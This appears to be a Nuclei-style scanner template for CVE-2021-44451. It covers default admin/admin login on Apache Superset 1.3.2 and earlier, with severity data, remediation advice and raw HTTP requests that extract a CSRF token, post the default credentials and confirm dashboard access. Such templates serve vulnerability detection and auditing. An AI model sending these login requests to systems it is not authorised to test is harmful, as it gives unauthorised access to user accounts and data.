id: CVE-2021-44451 info: name: Apache Superset <=1.3.2 - Default Login author: dhiyaneshDK severity: medium description: | Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: Upgrade to Apache Superset 1.4.0 or higher. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 epss-score: 0.00614 epss-percentile: 0.76368 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: apache product: superset shodan-query: http.favicon.hash:1582430156 tags: cve,cve2021,apache,superset,default-login http: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_token={{csrf_token}}&username={{username}}&password={{password}} - | GET /dashboard/list/ HTTP/1.1 Host: {{Hostname}} payloads: username: - admin password: - admin attack: pitchfork matchers-condition: and matchers: - type: word part: header_2 words: - 'session' - type: word part: body_3 words: - 'DashboardFilterStateRestApi' extractors: - type: regex name: csrf_token group: 1 regex: - 'name="csrf_token" type="hidden" value="(.*)"' internal: true part: body # digest: 4b0a004830460221009b6e1adec5d50eaadaf73b51d8147f26608ab58e813f9b8cf485811ff6f4b9ad022100b5197bf3a7d654d5ecee2684ba1b8d710f286bd828ea92099456c0124c7f1535:922c64590222798bb761d5b6d8e72950